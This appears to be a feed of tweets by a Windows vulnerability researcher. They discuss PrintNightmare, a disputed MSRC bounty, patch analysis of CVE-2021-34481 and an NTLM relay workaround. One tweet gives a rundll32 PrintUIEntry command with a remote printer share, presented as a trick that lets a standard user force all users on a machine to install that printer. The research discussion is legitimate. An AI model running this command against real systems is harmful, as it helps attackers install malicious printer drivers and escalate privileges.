@winlogon0 It is 0x7C, and I don't know what it stands for here. It is caused by failure of authentication, and there may be other error codes depends on the environment.
Just found that not publish slides of conference for years, so upload recent ones: https://t.co/ZtPZKrZkR4
And I will talk at #POC2021 next week, would you join the talk? ^_^
@HaifeiLi Hotmail and Outlook are the same thing now, am I right? I got email lost occasionally for both direction while communicating with MSRC. Yes, I do check the Junk and it really lost, not in Junk box.
@jonasLyk Looks like those used in WDAG & Sandbox. I have talk about it at POC 2018: https://t.co/P12fkjyIeA and Alex Ilgayev has wrote a blog with updates and more detail this year: https://t.co/8xbiC06Ver
@FuzzySec PrintNightmare also got $5k, actually $0 if I not post the POC video. However, I think they can save the $5k next time, since it does not affect the stock price at all. That's the logic behind.
Did you realize that all #printnightmare fix are try to restrict to administrators? It essentially allow UAC bypass. Of course UAC is not a security boundary, so this is not a security issue.
But my favorite (for now) #printnightmare dirty trick is: *as a standard user* the way to *force* all other users/admins of workstation/server to install printers😂
rundll32 printui,PrintUIEntry /ga /n"\\print.lab.local\Kiwi Legit Printer"
Rpc(Asyn)cAddPerMachineConnection
@Diz_Sec@msftsecresponse@gentilkiwi Initial patch analysis show that CVE-2021-34481 only fix @Junior_Baines 's driver install issue, which is not necessary to copy file. Now, 2 of them is public, one is fixed, one not.
@Diz_Sec@msftsecresponse@gentilkiwi Initial patch analysis show that CVE-2021-34481 only fix @Junior_Baines 's driver install issue, which is not necessary to copy file. Now, 2 of them is public, one is fixed, one not.
(2/n) MSRC do not agree that this issue is eligible for remote attack scenario, although the fore-discuss let me think so. And NTLM relay is unacceptable even it dose work. Thus, I need to finish my tech to get rid of NTLM relay for some similar vulnerabilities.
@gentilkiwi I think they only fix CVE-2021-34481 and treat this as variant of it because of the Kyocera. That is the result of lack of communication with researchers. Which is the result of their unfriendly attitude.